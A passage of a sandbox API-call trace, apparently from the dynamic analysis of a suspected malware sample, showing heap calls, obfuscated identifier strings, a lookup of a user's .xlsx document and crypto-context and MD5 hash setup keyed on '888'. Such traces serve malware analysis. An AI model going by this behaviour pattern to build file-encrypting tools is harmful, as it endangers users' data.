hHeap=0x2af0000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf60 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0c8 | out: hHeap=0x2af0000) returned 1 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.416] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.416] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.417] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.417] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72288 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0220.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72398 [0220.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab050 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0220.418] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.418] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.418] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/tMLcqE8DzcE8ZL.xlsx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x22b9b4e0, ftCreationTime.dwHighDateTime=0x1d58feb, ftLastAccessTime.dwLowDateTime=0x63d44870, ftLastAccessTime.dwHighDateTime=0x1d5697e, ftLastWriteTime.dwLowDateTime=0x63d44870, ftLastWriteTime.dwHighDateTime=0x1d5697e, nFileSizeHigh=0x0, nFileSizeLow=0x4e15, dwReserved0=0x0, dwReserved1=0x0, cFileName="tMLcqE8DzcE8ZL.xlsx", cAlternateFileName="TMLCQE~1.XLS")) returned 0x9e21f8 [0220.418] FindClose (in: hFindFile=0x9e21f8 | out: hFindFile=0x9e21f8) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab050 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab080 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b98 | out: hHeap=0x2af0000) returned 1 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0220.419] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0220.419] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab578 [0220.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721b8 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0220.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab500 [0220.420] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.420] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.420] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.420] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0220.421] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e18 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.421] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0220.421] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f60 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.422] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0220.422] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.423] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.423] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab938 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab818 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab950 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab908 | out: hHeap=0x2af0000) returned 1 [0220.423] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0220.423] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0220.423] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0220.424] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.424] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.424] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0220.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6ee0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0220.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0220.424] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0220.424] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c440) returned 1 [0220.425] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0220.425] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0220.425] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.425] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0220.439] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0220.439] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0220.439] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aabc80, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0220.440] CryptCreateHash (in: hProv=0xa7c440, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0220.440] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 